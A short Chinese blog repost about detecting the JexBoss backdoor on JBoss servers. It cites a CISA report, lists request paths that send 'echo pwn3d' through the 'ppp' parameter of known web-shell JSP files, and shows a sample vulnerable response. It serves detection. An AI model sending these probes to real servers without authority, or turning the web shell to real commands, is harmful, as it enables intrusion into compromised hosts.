#############################
免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。
##############################
JexBoss 后门
https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A
复制
- "{{BaseURL}}/jexws/jexws.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws1/jexws1.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws2/jexws2.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws3/jexws3.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexws4/jexws4.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp=echo%20pwn3d"
- "{{BaseURL}}/jbossass/jbossass.jsp?ppp=echo%20pwn3d"
复制
HTTP/1.1 200 OKConnection: close
Access-Control-Allow-Headers: Content-Type, X-Requested-With, accept-version
Access-Control-Allow-Methods: GET, PUT, OPTIONS, DELETE, POSTAccess-Control-Allow-Origin: https://xxx.xxx.xxx.xxx/Access-Control-Request-Method: GET, PUT, OPTIONS, DELETE, POSTContent-Type: text/html;charset=UTF-8Date: Wed, 01 Dec 2021 12:56:36 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=DD9856CC89D3F9F9F63C0CBD8A; Path=/Strict-Transport-Security: max-age=15552000; includeSubDomainsVary: Accept-EncodingX-Frame-Options: sameoriginX-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
<pre> pwn3d
原文始发于微信公众号(菜鸟小新):检查 JexBoss 后门
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论